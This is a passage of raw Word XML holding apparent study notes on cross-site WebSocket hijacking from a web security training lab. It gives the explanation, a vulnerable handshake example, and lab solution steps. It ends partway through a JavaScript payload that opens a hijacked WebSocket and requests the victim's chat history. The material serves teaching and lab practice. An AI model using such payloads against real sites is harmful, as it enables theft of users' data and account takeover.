          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6291047E" wp14:editId="7066475D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="71619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92951" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9F60F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="62515EDC" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0004175D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0004175D">
        <w:t xml:space="preserve">Using cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0004175D">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0004175D">
        <w:t xml:space="preserve"> to exploit vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B10DB6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0004175D" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0004175D">
        <w:t xml:space="preserve">Some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0004175D">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0004175D">
        <w:t xml:space="preserve"> security vulnerabilities arise when an attacker makes a cross-domain WebSocket connection from a web site that the attacker controls. This is known as a cross-site WebSocket hijacking attack, and it involves exploiting a cross-site request forgery (CSRF) vulnerability on a WebSocket handshake. The attack often has a serious impact, allowing an attacker to perform privileged actions on behalf of the victim user or capture sensitive data to which the victim user has access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167FF9F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="003C5D31">
        <w:t>Cross-site WebSocket hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC63DF1" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003C5D31">
        <w:t xml:space="preserve">In this section, we'll explain cross-site WebSocket hijacking (CSWSH), describe the impact of a compromise, and spell out how to perform a cross-site WebSocket hijacking attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394335D2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="003C5D31">
        <w:t>What is cross-site WebSocket hijacking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62748916" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003C5D31">
        <w:t xml:space="preserve">Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a cross-site request forgery (CSRF) vulnerability on a </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:anchor="how-are-websocket-connections-established" w:history="1">
        <w:r w:rsidRPr="003C5D31">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>WebSocket handshake</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003C5D31">
        <w:t xml:space="preserve">. It arises when the WebSocket handshake request relies solely on HTTP cookies for session handling and does not contain any CSRF tokens or other unpredictable values. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBBFBFE" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003C5D31">
        <w:t xml:space="preserve">An attacker can create a malicious web page on their own domain which establishes a cross-site WebSocket connection to the vulnerable application. The application will handle the connection in the context of the victim user's session with the application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF016F" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="003C5D31">
        <w:t xml:space="preserve">The attacker's page can then send arbitrary messages to the server via the connection and read the contents of messages that are received back from the server. This means that, unlike regular CSRF, the attacker gains two-way interaction with the compromised application. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA6E812" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="003C5D31" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="7D21F831" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0010475A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0010475A">
        <w:lastRenderedPageBreak/>
        <w:t>What is the impact of cross-site WebSocket hijacking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B612B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0010475A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="0010475A">
        <w:t xml:space="preserve">A successful cross-site WebSocket hijacking attack will often enable an attacker to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B81B7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0010475A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0010475A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform unauthorized actions masquerading as the victim user.</w:t>
      </w:r>
      <w:r w:rsidRPr="0010475A">
        <w:t xml:space="preserve"> As with regular CSRF, the attacker can send arbitrary messages to the server-side application. If the application uses client-generated WebSocket messages to perform any sensitive actions, then the attacker can generate suitable messages cross-domain and trigger those actions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C342D" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0010475A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retrieve sensitive data that the user can access.</w:t>
      </w:r>
      <w:r w:rsidRPr="0010475A">
        <w:t xml:space="preserve"> Unlike with regular CSRF, cross-site WebSocket hijacking gives the attacker two-way interaction with the vulnerable application over the hijacked WebSocket. If the application uses server-generated WebSocket messages to return any sensitive data to the user, then the attacker can intercept those messages and capture the victim user's data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA955E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0010475A" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="4170E3A8" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0010475A" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0010475A">
        <w:t>Performing a cross-site WebSocket hijacking attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DA79D4" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve">Since a cross-site WebSocket hijacking attack is essentially a CSRF vulnerability on a WebSocket handshake, the first step to performing an attack is to review the WebSocket handshakes that the application carries out and determine whether they are protected against CSRF. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32806CAB" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve">In terms of the </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:anchor="how-does-csrf-work" w:history="1">
        <w:r w:rsidRPr="00E769F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>normal conditions for CSRF attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve">, you typically need to find a handshake message that relies solely on HTTP cookies for session handling and doesn't employ any tokens or other unpredictable values in request parameters. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5ADDF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve">For example, the following WebSocket handshake request is probably vulnerable to CSRF, because the only session token is transmitted in a cookie: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BFE02" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /chat HTTP/1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: normal-website.com </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-WebSocket-Version: 13 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w== </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: keep-alive, Upgrade </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD341D">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2ACC5CD5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D122381" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00E769F8" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Sec-WebSocket-Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00E769F8">
        <w:t xml:space="preserve"> header contains a random value to prevent errors from caching proxies, and is not used for authentication or session handling purposes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8FAAF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">If the WebSocket handshake request is vulnerable to CSRF, then an attacker's web page can perform a cross-site request to open a WebSocket on the vulnerable site. What happens next in the attack depends entirely on the application's logic and how it is using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05692">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">. The attack might involve: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E5D7EC" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">Sending WebSocket messages to perform unauthorized actions on behalf of the victim user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53997C75" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">Sending WebSocket messages to retrieve sensitive data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42487AEE" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">Sometimes, just waiting for incoming messages to arrive containing sensitive data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A0E1E9" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472"/>
    <w:p w14:paraId="4407A599" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D05692">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7468C575" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00D05692" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve">PRACTITIONER </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00D05692">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cross-site WebSocket hijacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D05692">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C0267" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC70EF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC70EF">
        <w:t xml:space="preserve">This online shop has a live chat feature implemented using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC70EF">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC70EF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A50EA6" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC70EF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC70EF">
        <w:t xml:space="preserve">To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00FC70EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>cross-site WebSocket hijacking attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC70EF">
        <w:t xml:space="preserve"> to exfiltrate the victim's chat history, then use this gain access to their account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2FB911" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC70EF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC70EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB94F2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="00FC70EF" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:r w:rsidRPr="00FC70EF">
        <w:t xml:space="preserve">To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EDE499" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67B5DF" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>w/o collaborator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B90241" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:t xml:space="preserve">Click "Live chat" and send a chat message. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08985414" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:t xml:space="preserve">Reload the page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE3C49" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:t xml:space="preserve">In Burp Proxy, in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0042376C">
        <w:t>WebSockets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0042376C">
        <w:t xml:space="preserve"> history tab, observe that the "READY" command retrieves past chat messages from the server. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ECCA2B7" wp14:editId="2B8AF78F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7628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7770" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB9F21" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4801D1" wp14:editId="1E7A72BD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="175484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47754" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D469F7" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="0042376C" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:t>Right-click on the handshake request and select "Copy URL"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OR copy from browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1EC51" w14:textId="77777777" w:rsidR="00C80472" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0042376C">
        <w:t xml:space="preserve">In the browser, go to the exploit server and paste the following template into the "Body" section: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6503B31E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB81FA" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = new WebSocket('wss://0a94001104d4b6c385aa4921002c0093.web-security-academy.net/chat');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B64C3B" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.onopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C97494E" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>("READY");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3EEF5" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52FAA2" w14:textId="77777777" w:rsidR="00C80472" w:rsidRPr="008C11E1" w:rsidRDefault="00C80472" w:rsidP="00C80472">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ws.onmessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C11E1">
        <w:rPr>
